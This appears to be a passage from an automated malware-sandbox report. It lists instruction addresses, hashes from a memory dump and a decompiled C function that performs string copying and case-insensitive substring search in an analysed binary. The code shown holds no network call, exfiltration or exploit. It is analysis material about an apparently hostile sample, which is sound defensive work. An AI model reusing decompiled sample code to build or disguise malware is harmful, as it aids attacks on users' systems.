0x008b23f6
0x008b23f8
0x008b23fa
0x008b23fd
0x008b23ff
0x008b2401
0x008b2403
0x008b2403
0x008b2405
0x008b2405
0x008b2406
0x008b240b
0x008b240f
0x008b2411
0x00000000
0x00000000
0x008b2413
0x008b2417
0x008b241a
0x008b241c
0x00000000
0x00000000
0x00000000
0x008b241c
0x008b2405
0x008b2401
0x008b241e
0x008b241e
0x008b2420
0x008b2421
0x008b2426
0x008b2426
0x00000000
0x008b228d
0x008b228d
0x008b2291
0x008b2295
0x00000000
0x008b229b
0x008b229b
0x008b229d
0x008b229f
0x008b22a1
0x008b22a5
0x008b22a5
0x008b22a8
0x008b22c0
0x008b22d0
0x008b22d0
0x008b22d6
0x008b22d6
0x008b22db
0x008b22df
0x008b22e3
0x008b22e5
0x00000000
0x00000000
0x008b22eb
0x008b22ee
0x008b22f0
0x00000000
0x008b22f2
0x008b22f2
0x008b22f8
0x008b230d
0x008b230d
0x008b22fa
0x008b22fa
0x008b22fe
0x008b22fe
0x008b2302
0x00000000
0x00000000
0x008b2304
0x008b2305
0x008b230b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b230b
0x008b22fe
0x008b22f8
0x00000000
0x008b22f0
0x008b2467
0x008b246a
0x008b22aa
0x008b22ac
0x008b22ae
0x008b22b2
0x008b22b2
0x008b22b5
0x008b22b5
0x008b22b9
0x00000000
0x00000000
0x008b22bb
0x008b22bc
0x008b22be
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b22be
0x008b22b5
0x008b22a8
0x008b2312
0x008b2317
0x008b2317
0x008b231a
0x008b231d
0x008b2320
0x008b2322
0x008b2335
0x008b2338
0x008b2338
0x008b233e
0x008b2346
0x008b2346
0x008b2346
0x008b2349
0x008b2350
0x008b2353
0x008b2359
0x008b235b
0x008b2361
0x008b2363
0x008b2365
0x008b23b4
0x008b2367
0x008b2367
0x008b2369
0x008b236b
0x008b236e
0x008b2370
0x008b2372
0x008b2374
0x008b2376
0x008b237a
0x008b237d
0x008b237f
0x008b237f
0x008b2380
0x008b2385
0x008b2389
0x008b238b
0x00000000
0x00000000
0x008b238d
0x008b2391
0x008b2394
0x008b2396
0x00000000
0x00000000
0x00000000
0x008b2396
0x008b2398
0x008b239c
0x008b239c
0x008b2372
0x008b239f
0x008b23a1
0x008b23a2
0x008b23a6
0x008b23ab
0x008b23af
0x008b23af
0x008b23b7
0x008b23ba
0x008b23bd
0x008b2324
0x008b2324
0x008b2324
0x008b23bf
0x008b23c1
0x008b23c3
0x008b23c9
0x008b23c9
0x008b23cc
0x008b23cd
0x008b23cf
0x008b23d1
0x00000000
0x00000000
0x008b23d3
0x008b23d5
0x008b2461
0x00000000
0x00000000
0x00000000
0x00000000
0x008b23db
0x008b23db
0x008b23dd
0x008b23c7
0x008b23c8
0x008b23c8
0x00000000
0x008b23c8
0x00000000
0x008b23dd
0x008b23c9
0x008b23c1
0x008b2295
0x008b2189
0x008b2189
0x008b218e
0x008b2190
0x008b2192
0x008b219a
0x008b219c
0x008b21a2
0x008b21a4
0x008b21a6
0x008b21e0
0x008b21a8
0x008b21a8
0x008b21aa
0x008b21ac
0x008b21af
0x008b21b1
0x008b21b3
0x008b21b5
0x008b21b5
0x008b21b7
0x008b21b7
0x008b21b8
0x008b21bd
0x008b21c1
0x008b21c3
0x00000000
0x00000000
0x008b21c5
0x008b21c9
0x008b21cc
0x008b21ce
0x00000000
0x00000000
0x00000000
0x008b21ce
0x008b21b7
0x008b21b3
0x008b21d0
0x008b21d0
0x008b21d2
0x008b21d3
0x008b21d8
0x008b21d8
0x008b242e
0x008b242e
0x008b2431
0x008b2433
0x008b2433
0x008b2187
0x00000000
0x00000000
0x00000000
0x008b2082
0x008b243a
0x008b243a
0x008b243c
0x008b2440
0x008b244a
0x008b244e
0x008b245e
0x00000000

Strings

@, xrefs: 008B1F18

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 73f22bc3af338c376e1a23e00c2844d1b588c229ff9a55b9cec960deeffedffd
Instruction ID: c91e32a2ac56dd3fddf2076ffc082dfc2fd81fa2ffe2e87edf89ad68a6a407c4
Opcode Fuzzy Hash: 73f22bc3af338c376e1a23e00c2844d1b588c229ff9a55b9cec960deeffedffd
Instruction Fuzzy Hash: 63323A71A087924BDB25CE2CC4903AABBE2FFD6314F18866DE895CB356DB35D841C742

Uniqueness

Uniqueness Score: -1.00%

Function 008B26B0, Relevance: 1.9, Strings: 1, Instructions: 653
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E008B26B0(signed int __ecx, void* __eflags, signed int* _a4, char _a8) {
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void _v40;
				intOrPtr _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				char* _t183;
				signed int _t184;
				signed int* _t190;
				signed int _t194;
				signed int* _t195;
				signed int _t200;
				signed int _t204;
				void* _t206;
				signed int _t209;
				signed int _t212;
				signed int _t217;
				signed int* _t219;
				signed int _t220;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				signed int _t227;
				signed int _t228;
				signed int _t231;
				signed int _t232;
				signed int _t235;
				char _t236;
				signed int _t240;
				void* _t241;
				void* _t242;
				unsigned int _t247;
				signed int _t249;
				signed int _t250;
				signed int _t252;
				signed int _t254;
				signed int _t255;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				char _t260;
				char _t261;
				signed int _t262;
				signed int _t263;
				signed int _t266;
				signed int _t272;
				signed int _t273;
				signed int _t275;
				signed int _t277;
				signed int _t279;
				signed int _t280;
				void* _t281;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				void* _t285;
				signed int _t289;
				void* _t290;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				intOrPtr* _t295;
				void* _t296;
				signed int _t297;
				intOrPtr* _t298;
				signed int _t299;
				signed int _t300;
				void* _t303;
				signed int _t305;
				char _t306;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t329;
				char _t331;
				char _t332;
				char _t333;
				signed int _t335;
				unsigned int _t340;
				signed int _t342;
				intOrPtr _t344;
				intOrPtr _t346;
				signed int _t347;
				signed int _t356;
				signed int _t358;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed int _t373;
				intOrPtr* _t376;
				signed int _t377;
				signed int _t383;
				signed int _t384;
				void* _t387;

				_v52 = 0;
				_t231 = __ecx;
				_v48 = 0;
				_push(0x40);
				_t335 = E008A1030();
				_t387 = (_t384 & 0xfffffff0) - 0x34 + 4;
				_t183 = _v52;
				if(_t183 == 0) {
					 *_t335 = 0;
					L8:
					_t184 = _a8;
					_v48 = 0x40;
					_v52 = _t335;
					if(_t184 != 0) {
						__eflags = _t335;
						if(_t335 == 0) {
							_t257 = 0x40;
							_t361 = 0;
							L22:
							_t20 = _t361 + 2; // 0x80000001
							_t290 = _t20;
							__eflags = _t290 - 0x40;
							_t291 =  <=  ? 0x40 : _t290;
							__eflags = _t257 - _t291;
							if(_t257 < _t291) {
								_t340 = (_t291 >> 5 >> 0x1a) + _t291 >> 6;
								_t292 = _t291 & 0x8000003f;
								__eflags = _t292;
								if(_t292 < 0) {
									_t292 = (_t292 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t292;
								}
								__eflags = _t292;
								_t342 = _t340 + (0 | _t292 > 0x00000000) << 6;
								_push(_t342);
								_t258 = E008A1030();
								_t387 = _t387 + 4;
								_t293 = _v52;
								__eflags = _t293;
								if(_t293 == 0) {
									 *_t258 = 0;
									goto L35;
								} else {
									__eflags = _t258;
									if(_t258 == 0) {
										L33:
										_push(1);
										_push(_t293);
										_v68 = _t258;
										E008A10B0();
										_t258 = _v68;
										_t387 = _t387 + 8;
										L35:
										_v48 = _t342;
										_v52 = _t258;
										L36:
										 *((char*)(_t258 + _t361)) = _a8;
										_t190 =  &_v52;
										 *((char*)(_t361 +  *_t190 + 1)) = 0;
										L37:
										_t259 =  *_t190;
										if(_t259 == 0) {
											L39:
											_t295 = _a4;
											_push(0x40);
											 *_t295 = 0;
											 *((intOrPtr*)(_t295 + 4)) = 0;
											_t232 = E008A1030();
											_t387 = _t387 + 4;
											_t194 =  *_a4;
											if(_t194 == 0) {
												 *_t232 = 0;
												L60:
												_t195 = _a4;
												 *_t195 = _t232;
												_t195[1] = 0x40;
												L61:
												_push(1);
												_push(_v52);
												E008A10B0();
												_v52 = 0;
												_v48 = 0;
												return _a4;
											}
											if(_t232 == 0) {
												L45:
												_push(1);
												_push(_t194);
												E008A10B0();
												_t387 = _t387 + 8;
												goto L60;
											}
											_t296 =  *_t194;
											 *_t232 = _t296;
											if(_t296 == 0) {
												goto L45;
											}
											_t297 = 0;
											while(1) {
												_t297 = _t297 + 1;
												_t260 =  *((char*)(_t194 + _t297 * 2 - 1));
												 *((char*)(_t232 + _t297 * 2 - 1)) = _t260;
												if(_t260 == 0) {
													goto L45;
												}
												_t261 =  *((char*)(_t194 + _t297 * 2));
												 *((char*)(_t232 + _t297 * 2)) = _t261;
												if(_t261 != 0) {
													continue;
												}
												goto L45;
											}
											goto L45;
										}
										_t344 =  *_t259;
										if(_t344 != 0) {
											_t200 =  *_t231;
											__eflags = _t200;
											if(_t200 == 0) {
												L52:
												_t298 = _a4;
												_push(0x40);
												 *_t298 = 0;
												 *((intOrPtr*)(_t298 + 4)) = 0;
												_t232 = E008A1030();
												_t387 = _t387 + 4;
												_t204 =  *_a4;
												__eflags = _t204;
												if(_t204 == 0) {
													 *_t232 = 0;
													goto L60;
												}
												__eflags = _t232;
												if(_t232 == 0) {
													L58:
													_push(1);
													_push(_t204);
													E008A10B0();
													_t387 = _t387 + 8;
													goto L60;
												}
												_t299 =  *_t204;
												 *_t232 = _t299;
												__eflags = _t299;
												if(_t299 == 0) {
													goto L58;
												}
												_t300 = 0;
												__eflags = 0;
												while(1) {
													_t300 = _t300 + 1;
													_t262 =  *((char*)(_t204 + _t300 * 2 - 1));
													 *(_t232 + _t300 * 2 - 1) = _t262;
													__eflags = _t262;
													if(_t262 == 0) {
														goto L58;
													}
													_t263 =  *((char*)(_t204 + _t300 * 2));
													 *(_t232 + _t300 * 2) = _t263;
													__eflags = _t263;
													if(_t263 != 0) {
														continue;
													}
													goto L58;
												}
												goto L58;
											}
											__eflags =  *_t200;
											if( *_t200 == 0) {
												goto L52;
											}
											_v44 = _t344;
											_t62 = _t344 - 0x41; // 0x7fffffc0
											_t363 = _t62;
											__eflags = _t363 - 0x19;
											_t63 = _t344 + 0x20; // 0x80000021
											_v64 = _t363;
											_t302 =  >  ? _t344 : _t63;
											_t234 =  >  ? _t344 : _t63;
											_t303 = 0;
											__eflags = 0;
											_v68 =  >  ? _t344 : _t63;
											_v32 = _t259;
											_t235 = _t200;
											while(1) {
												_t264 =  *_t235;
												_t66 = _t264 - 0x41; // -65
												__eflags = _t66 - 0x19;
												_t67 = _t264 + 0x20; // 0x20
												_t265 =  <=  ? _t67 :  *_t235;
												__eflags = ( <=  ? _t67 :  *_t235) - _v68;
												if(( <=  ? _t67 :  *_t235) == _v68) {
													break;
												}
												_t303 = _t303 + 1;
												_t235 = _t235 + 1;
												__eflags =  *((char*)(_t303 + _t200));
												if( *((char*)(_t303 + _t200)) != 0) {
													continue;
												}
												goto L52;
											}
											_t346 = _v44;
											_t266 = _v32;
											__eflags = _t235;
											if(_t235 == 0) {
												goto L52;
											}
											_t305 = _t266 & 0x0000000f;
											_v40 = _t346 + 0x20;
											asm("pxor xmm0, xmm0");
											_v36 = _t200;
											_t368 =  ~_t305 + 0x10;
											__eflags = _t368;
											_v44 = _t346;
											_v32 = _t266;
											do {
												_t347 = _t305;
												__eflags = _t305;
												if(_t305 == 0) {
													L69:
													_v28 = _t368;
													_t272 =  ~( ~_t347 + 0x0000000f & 0x0000000f) + 0x7fffffff;
													__eflags = _t272;
													_t369 = _v32;
													while(1) {
														asm("movdqu xmm1, [esi+edi]");
														asm("pcmpeqb xmm1, xmm0");
														asm("pmovmskb eax, xmm1");
														__eflags = _t200;
														if(_t200 != 0) {
															break;
														}
														_t347 = _t347 + 0x10;
														__eflags = _t347 - _t272;
														if(_t347 < _t272) {
															continue;
														}
														_v32 = _t369;
														_t370 = _v28;
														__eflags = _t272 - 0x7fffffff;
														if(_t272 >= 0x7fffffff) {
															L77:
															_t272 = 0x7fffffff;
															L78:
															_v56 = _t272;
															_t206 = 0;
															__eflags = 0;
															_v60 = _t305;
															_v28 = _t370;
															_t273 = _v32;
															while(1) {
																_t306 =  *((char*)(_t206 + _t235));
																_v68 = _t235;
																_t236 =  *((char*)(_t206 + _t273));
																__eflags = _t306 - 0x61 - 0x19;
																_t307 =  <=  ? _t306 - 0x20 : _t306;
																__eflags = _t236 - 0x61 - 0x19;
																_t308 =  <=  ? _t306 - 0x20 : _t306;
																_t237 =  <=  ? _t236 - 0x20 : _t236;
																_t238 =  <=  ? _t236 - 0x20 : _t236;
																__eflags = _t308 - ( <=  ? _t236 - 0x20 : _t236);
																_t235 = _v68;
																if(__eflags < 0 || __eflags > 0) {
																	break;
																}
																__eflags = _t308;
																if(_t308 == 0) {
																	L83:
																	_t209 = _v36;
																	_t305 = _v60;
																	_t368 = _v28;
																	L84:
																	__eflags = _t235;
																	if(_t235 == 0) {
																		goto L52;
																	}
																	__eflags = _t305;
																	if(_t305 == 0) {
																		L89:
																		_t356 =  ~( ~_t305 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																		__eflags = _t356;
																		while(1) {
																			asm("movdqu xmm1, [ecx+edx]");
																			asm("pcmpeqb xmm1, xmm0");
																			asm("pmovmskb esi, xmm1");
																			__eflags = _t368;
																			if(_t368 != 0) {
																				break;
																			}
																			_t305 = _t305 + 0x10;
																			__eflags = _t305 - _t356;
																			if(_t305 < _t356) {
																				continue;
																			}
																			__eflags = _t356 - 0x7fffffff;
																			if(_t356 >= 0x7fffffff) {
																				L95:
																				_t356 = 0x7fffffff;
																				L96:
																				_t277 = _t209 & 0x0000000f;
																				__eflags = _t277;
																				if(_t277 == 0) {
																					L100:
																					_t317 =  ~( ~_t277 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																					__eflags = _t317;
																					while(1) {
																						asm("movdqu xmm1, [eax+ecx]");
																						asm("pcmpeqb xmm1, xmm0");
																						asm("pmovmskb esi, xmm1");
																						__eflags = _t368;
																						if(_t368 != 0) {
																							break;
																						}
																						_t277 = _t277 + 0x10;
																						__eflags = _t277 - _t317;
																						if(_t277 < _t317) {
																							continue;
																						}
																						__eflags = _t317 - 0x7fffffff;
																						if(_t317 >= 0x7fffffff) {
																							L106:
																							_t317 = 0x7fffffff;
																							L107:
																							_t240 = _t235 - _t209 + _t356;
																							__eflags = _t240;
																							_t376 = _a4;
																							_t241 =  <=  ? 0 : _t240;
																							__eflags = _t317 - _t241;
																							 *_t376 = 0;
																							_t242 =  <  ? _t317 : _t241;
																							_t318 = _t317 - _t242;
																							 *((intOrPtr*)(_t376 + 4)) = 0;
																							_t358 = _t209 + _t242;
																							__eflags = _t358;
																							_v64 = _t358;
																							if(_t358 == 0) {
																								L142:
																								_push(0x40);
																								_t232 = E008A1030();
																								_t387 = _t387 + 4;
																								_t212 =  *_a4;
																								__eflags = _t212;
																								if(_t212 == 0) {
																									 *_t232 = 0;
																									goto L60;
																								}
																								__eflags = _t232;
																								if(_t232 == 0) {
																									L148:
																									_push(1);
																									_push(_t212);
																									E008A10B0();
																									_t387 = _t387 + 8;
																									goto L60;
																								}
																								_t319 =  *_t212;
																								 *_t232 = _t319;
																								__eflags = _t319;
																								if(_t319 == 0) {
																									goto L148;
																								}
																								_t320 = 0;
																								__eflags = 0;
																								while(1) {
																									_t320 = _t320 + 1;
																									_t279 =  *((char*)(_t212 + _t320 * 2 - 1));
																									 *(_t232 + _t320 * 2 - 1) = _t279;
																									__eflags = _t279;
																									if(_t279 == 0) {
																										goto L148;
																									}
																									_t280 =  *((char*)(_t212 + _t320 * 2));
																									 *(_t232 + _t320 * 2) = _t280;
																									__eflags = _t280;
																									if(_t280 != 0) {
																										continue;
																									}
																									goto L148;
																								}
																								goto L148;
																							}
																							__eflags =  *(_t209 + _t242);
																							if( *(_t209 + _t242) == 0) {
																								goto L142;
																							}
																							__eflags = _t318;
																							if(_t318 != 0) {
																								L121:
																								_t129 = _t318 + 1; // 0x80000000
																								_t281 = _t129;
																								__eflags = _t281 - 0x40;
																								_t282 =  <=  ? 0x40 : _t281;
																								__eflags = _t282;
																								if(_t282 > 0) {
																									_t247 = (_t282 >> 5 >> 0x1a) + _t282 >> 6;
																									_t283 = _t282 & 0x8000003f;
																									__eflags = _t283;
																									if(_t283 < 0) {
																										_t283 = (_t283 - 0x00000001 | 0xffffffc0) + 1;
																										__eflags = _t283;
																									}
																									__eflags = _t283;
																									_t249 = _t247 + (0 | _t283 > 0x00000000) << 6;
																									_push(_t249);
																									_v68 = _t318;
																									_t217 = E008A1030();
																									_t318 = _v68;
																									_t377 = _t217;
																									_t387 = _t387 + 4;
																									_t284 =  *_a4;
																									__eflags = _t284;
																									if(_t284 == 0) {
																										 *_t377 = 0;
																										goto L134;
																									} else {
																										__eflags = _t377;
																										if(_t377 == 0) {
																											L132:
																											_push(1);
																											_push(_t284);
																											_v68 = _t318;
																											E008A10B0();
																											_t318 = _v68;
																											_t387 = _t387 + 8;
																											L134:
																											_t219 = _a4;
																											_t219[1] = _t249;
																											 *_t219 = _t377;
																											L135:
																											__eflags = _t377;
																											if(_t377 == 0) {
																												goto L61;
																											}
																											_t250 = _v64;
																											_t285 = 0;
																											while(1) {
																												_t220 =  *_t250;
																												_t285 = _t285 + 1;
																												 *_t377 = _t220;
																												__eflags = _t318;
																												if(_t318 == 0) {
																													goto L140;
																												}
																												__eflags = _t285 - _t318;
																												if(_t285 == _t318) {
																													 *(_t377 + 1) = 0;
																													goto L61;
																												}
																												L140:
																												__eflags = _t220;
																												if(_t220 == 0) {
																													goto L61;
																												}
																												_t377 = _t377 + 1;
																												_t250 = _t250 + 1;
																												__eflags = _t250;
																											}
																										}
																										_t222 =  *_t284;
																										 *_t377 = _t222;
																										__eflags = _t222;
																										if(_t222 == 0) {
																											goto L132;
																										}
																										_v68 = _t318;
																										_t359 = 0;
																										__eflags = 0;
																										while(1) {
																											_t359 = _t359 + 1;
																											_t223 =  *((char*)(_t284 + _t359 * 2 - 1));
																											 *(_t377 + _t359 * 2 - 1) = _t223;
																											__eflags = _t223;
																											if(_t223 == 0) {
																												break;
																											}
																											_t224 =  *((char*)(_t284 + _t359 * 2));
																											 *(_t377 + _t359 * 2) = _t224;
																											__eflags = _t224;
																											if(_t224 != 0) {
																												continue;
																											}
																											break;
																										}
																										_t318 = _v68;
																										goto L132;
																									}
																								}
																								_t377 = 0;
																								goto L135;
																							}
																							_t225 = _t209 + _t242;
																							_t252 = _t225 & 0x0000000f;
																							__eflags = _t252;
																							if(_t252 == 0) {
																								L114:
																								_t318 =  ~( ~_t252 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																								__eflags = _t318;
																								while(1) {
																									asm("movdqu xmm1, [eax+ebx]");
																									asm("pcmpeqb xmm1, xmm0");
																									asm("pmovmskb ecx, xmm1");
																									__eflags = 0;
																									if(0 != 0) {
																										break;
																									}
																									_t252 = _t252 + 0x10;
																									__eflags = _t252 - _t318;
																									if(_t252 < _t318) {
																										continue;
																									}
																									__eflags = _t318 - 0x7fffffff;
																									if(_t318 >= 0x7fffffff) {
																										L120:
																										_t318 = 0x7fffffff;
																										goto L121;
																									} else {
																										goto L118;
																									}
																									while(1) {
																										L118:
																										__eflags =  *((char*)(_t318 + _t225));
																										if( *((char*)(_t318 + _t225)) == 0) {
																											goto L121;
																										}
																										_t318 = _t318 + 1;
																										__eflags = _t318 - 0x7fffffff;
																										if(_t318 < 0x7fffffff) {
																											continue;
																										}
																										goto L120;
																									}
																									goto L121;
																								}
																								asm("bsf edx, ecx");
																								_t318 = _t318 + _t252;
																								goto L121;
																							}
																							_t318 = 0;
																							_t252 =  ~_t252 + 0x10;
																							__eflags = _t252;
																							while(1) {
																								__eflags =  *((char*)(_t318 + _t225));
																								if( *((char*)(_t318 + _t225)) == 0) {
																									goto L121;
																								}
																								_t318 = _t318 + 1;
																								__eflags = _t318 - _t252;
																								if(_t318 < _t252) {
																									continue;
																								}
																								goto L114;
																							}
																							goto L121;
																						} else {
																							goto L104;
																						}
																						while(1) {
																							L104:
																							__eflags =  *((char*)(_t317 + _t209));
																							if( *((char*)(_t317 + _t209)) == 0) {
																								goto L107;
																							}
																							_t317 = _t317 + 1;
																							__eflags = _t317 - 0x7fffffff;
																							if(_t317 < 0x7fffffff) {
																								continue;
																							}
																							goto L106;
																						}
																						goto L107;
																					}
																					asm("bsf edx, esi");
																					_t317 = _t317 + _t277;
																					goto L107;
																				}
																				_t317 = 0;
																				_t277 =  ~_t277 + 0x10;
																				__eflags = _t277;
																				while(1) {
																					__eflags =  *((char*)(_t317 + _t209));
																					if( *((char*)(_t317 + _t209)) == 0) {
																						goto L107;
																					}
																					_t317 = _t317 + 1;
																					__eflags = _t317 - _t277;
																					if(_t317 < _t277) {
																						continue;
																					}
																					goto L100;
																				}
																				goto L107;
																			} else {
																				goto L93;
																			}
																			while(1) {
																				L93:
																				__eflags =  *((char*)(_t356 + _t273));
																				if( *((char*)(_t356 + _t273)) == 0) {
																					goto L96;
																				}
																				_t356 = _t356 + 1;
																				__eflags = _t356 - 0x7fffffff;
																				if(_t356 < 0x7fffffff) {
																					continue;
																				}
																				goto L95;
																			}
																			goto L96;
																		}
																		asm("bsf edi, esi");
																		_t356 = _t356 + _t305;
																		goto L96;
																	}
																	_t305 = _t368;
																	_t356 = 0;
																	__eflags = 0;
																	while(1) {
																		__eflags =  *((char*)(_t356 + _t273));
																		if( *((char*)(_t356 + _t273)) == 0) {
																			goto L96;
																		}
																		_t356 = _t356 + 1;
																		__eflags = _t356 - _t368;
																		if(_t356 < _t368) {
																			continue;
																		}
																		goto L89;
																	}
																	goto L96;
																}
																_t206 = _t206 + 1;
																__eflags = _t206 - _v56;
																if(_t206 < _v56) {
																	continue;
																}
																goto L83;
															}
															_v32 = _t273;
															_t309 = _v60;
															_t373 = _v28;
															_t275 = _t235 + 1;
															__eflags = _t275;
															if(_t275 == 0) {
																goto L52;
															}
															__eflags = _v64 - 0x19;
															_t208 =  <=  ? _v40 : _v44;
															_t200 =  <=  ? _v40 : _v44;
															__eflags =  *(_t235 + 1);
															if( *(_t235 + 1) == 0) {
																goto L52;
															}
															_v60 = _t309;
															_v28 = _t373;
															while(1) {
																_t235 = _t235 + 1;
																_t275 = _t275 + 1;
																_t310 =  *_t235 & 0x000000ff;
																__eflags =  *((char*)(_t275 - 1)) + 0xffffffbf - 0x19;
																_t311 =  <=  ? _t310 + 0x20 : _t310;
																__eflags = ( <=  ? _t310 + 0x20 : _t310) - _t200;
																if(( <=  ? _t310 + 0x20 : _t310) == _t200) {
																	goto L165;
																}
																__eflags =  *_t275;
																if( *_t275 != 0) {
																	continue;
																}
																goto L52;
															}
															goto L165;
														}
														_t200 = _v32;
														while(1) {
															__eflags =  *((char*)(_t272 + _t200));
															if( *((char*)(_t272 + _t200)) == 0) {
																break;
															}
															_t272 = _t272 + 1;
															__eflags = _t272 - 0x7fffffff;
															if(_t272 < 0x7fffffff) {
																continue;
															}
															_v32 = _t200;
															goto L77;
														}
														L160:
														_v32 = _t200;
														L161:
														__eflags = _t272;
														if(__eflags == 0) {
															goto L77;
														}
														if(__eflags > 0) {
															goto L78;
														}
														_t209 = _v36;
														_t273 = _v32;
														goto L84;
													}
													asm("bsf ecx, eax");
													_v32 = _t369;
													_t272 = _t272 + _t347;
													_t370 = _v28;
													goto L161;
												}
												_t200 = _v32;
												_t347 = _t368;
												_t272 = 0;
												__eflags = 0;
												while(1) {
													__eflags =  *((char*)(_t272 + _t200));
													if( *((char*)(_t272 + _t200)) == 0) {
														goto L160;
													}
													_t272 = _t272 + 1;
													__eflags = _t272 - _t368;
													if(_t272 < _t368) {
														continue;
													}
													_v32 = _t200;
													goto L69;
												}
												goto L160;
												L165:
												_t305 = _v60;
												_t368 = _v28;
												__eflags = _t235;
											} while (_t235 != 0);
											goto L52;
										}
										goto L39;
									}
									_t227 =  *_t293;
									 *_t258 = _t227;
									__eflags = _t227;
									if(_t227 == 0) {
										goto L33;
									}
									_v60 = _t342;
									_t228 = 0;
									__eflags = 0;
									_v64 = _t361;
									_v68 = _t231;
									while(1) {
										_t228 = _t228 + 1;
										_t254 =  *((char*)(_t293 + _t228 * 2 - 1));
										 *(_t258 + _t228 * 2 - 1) = _t254;
										__eflags = _t254;
										if(_t254 == 0) {
											break;
										}
										_t255 =  *((char*)(_t293 + _t228 * 2));
										 *(_t258 + _t228 * 2) = _t255;
										__eflags = _t255;
										if(_t255 != 0) {
											continue;
										}
										break;
									}
									_t342 = _v60;
									_t361 = _v64;
									_t231 = _v68;
									goto L33;
								}
							}
							_t258 = _v52;
							goto L36;
						}
						_t329 = _t335 & 0x0000000f;
						__eflags = _t329;
						if(_t329 == 0) {
							L15:
							asm("pxor xmm0, xmm0");
							_t383 =  ~( ~_t329 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							__eflags = _t383;
							while(1) {
								asm("movdqu xmm1, [edi+edx]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb eax, xmm1");
								__eflags = _t184;
								if(_t184 != 0) {
									break;
								}
								_t329 = _t329 + 0x10;
								__eflags = _t329 - _t383;
								if(_t329 < _t383) {
									continue;
								}
								__eflags = _t383 - 0x7fffffff;
								if(_t383 >= 0x7fffffff) {
									L21:
									_t257 = 0x40;
									_t361 = 0x7fffffff;
									goto L22;
								} else {
									goto L19;
								}
								while(1) {
									L19:
									__eflags =  *((char*)(_t383 + _t335));
									if( *((char*)(_t383 + _t335)) == 0) {
										break;
									}
									_t383 = _t383 + 1;
									__eflags = _t383 - 0x7fffffff;
									if(_t383 < 0x7fffffff) {
										continue;
									}
									goto L21;
								}
								L167:
								__eflags = _t361 - 0xfffffffe;
								if(_t361 != 0xfffffffe) {
									_t257 = 0x40;
								} else {
									 *_t335 = 0;
									_t257 = _v48;
								}
								goto L22;
							}
							asm("bsf esi, eax");
							_t361 = _t383 + _t329;
							goto L167;
						}
						_t361 = 0;
						_t329 =  ~_t329 + 0x10;
						__eflags = _t329;
						while(1) {
							__eflags =  *((char*)(_t361 + _t335));
							if( *((char*)(_t361 + _t335)) == 0) {
								goto L167;
							}
							_t361 = _t361 + 1;
							__eflags = _t361 - _t329;
							if(_t361 < _t329) {
								continue;
							}
							goto L15;
						}
						goto L167;
					}
					_t190 =  &_v52;
					goto L37;
				}
				if(_t335 == 0) {
					L6:
					_push(1);
					_push(_t183);
					E008A10B0();
					_t387 = _t387 + 8;
					goto L8;
				}
				_t331 =  *_t183;
				 *_t335 = _t331;
				if(_t331 == 0) {
					goto L6;
				}
				_t289 = 0;
				while(1) {
					_t289 = _t289 + 1;
					_t332 =  *((char*)(_t183 + _t289 * 2 - 1));
					 *((char*)(_t335 + _t289 * 2 - 1)) = _t332;
					if(_t332 == 0) {
						goto L6;
					}
					_t333 =  *((char*)(_t183 + _t289 * 2));
					 *((char*)(_t335 + _t289 * 2)) = _t333;
					if(_t333 != 0) {
						continue;
					}
					goto L6;
				}
				goto L6;
			}

0x008b26be
0x008b26c2
0x008b26c4
0x008b26c8
0x008b26cf
0x008b26d1
0x008b26d4
0x008b26da
0x008b2711
0x008b2714
0x008b2714
0x008b2718
0x008b2720
0x008b2726
0x008b2731
0x008b2733
0x008b2e47
0x008b2e4c
0x008b27ad
0x008b27b2
0x008b27b2
0x008b27b5
0x008b27b8
0x008b27bb
0x008b27bd
0x008b27d2
0x008b27d5
0x008b27d5
0x008b27db
0x008b27e3
0x008b27e3
0x008b27e3
0x008b27e6
0x008b27ed
0x008b27f0
0x008b27f6
0x008b27f8
0x008b27fb
0x008b27ff
0x008b2801
0x008b2856
0x00000000
0x008b2803
0x008b2803
0x008b2805
0x008b2841
0x008b2841
0x008b2843
0x008b2844
0x008b2848
0x008b284d
0x008b2851
0x008b2859
0x008b2859
0x008b285d
0x008b2861
0x008b2865
0x008b2868
0x008b286e
0x008b2873
0x008b2873
0x008b2877
0x008b2880
0x008b2880
0x008b2885
0x008b2887
0x008b2889
0x008b2891
0x008b2893
0x008b2899
0x008b289d
0x008b28d7
0x008b2983
0x008b2983
0x008b2986
0x008b2988
0x008b298f
0x008b298f
0x008b2991
0x008b2995
0x008b299f
0x008b29a3
0x008b29b3
0x008b29b3
0x008b28a1
0x008b28c7
0x008b28c7
0x008b28c9
0x008b28ca
0x008b28cf
0x00000000
0x008b28cf
0x008b28a3
0x008b28a6
0x008b28aa
0x00000000
0x00000000
0x008b28ac
0x008b28ae
0x008b28ae
0x008b28af
0x008b28b4
0x008b28ba
0x00000000
0x00000000
0x008b28bc
0x008b28c0
0x008b28c5
0x00000000
0x00000000
0x00000000
0x008b28c5
0x00000000
0x008b28ae
0x008b2879
0x008b287e
0x008b28df
0x008b28e1
0x008b28e3
0x008b292c
0x008b292c
0x008b2931
0x008b2933
0x008b2935
0x008b293d
0x008b293f
0x008b2945
0x008b2947
0x008b2949
0x008b2980
0x00000000
0x008b2980
0x008b294b
0x008b294d
0x008b2973
0x008b2973
0x008b2975
0x008b2976
0x008b297b
0x00000000
0x008b297b
0x008b294f
0x008b2952
0x008b2954
0x008b2956
0x00000000
0x00000000
0x008b2958
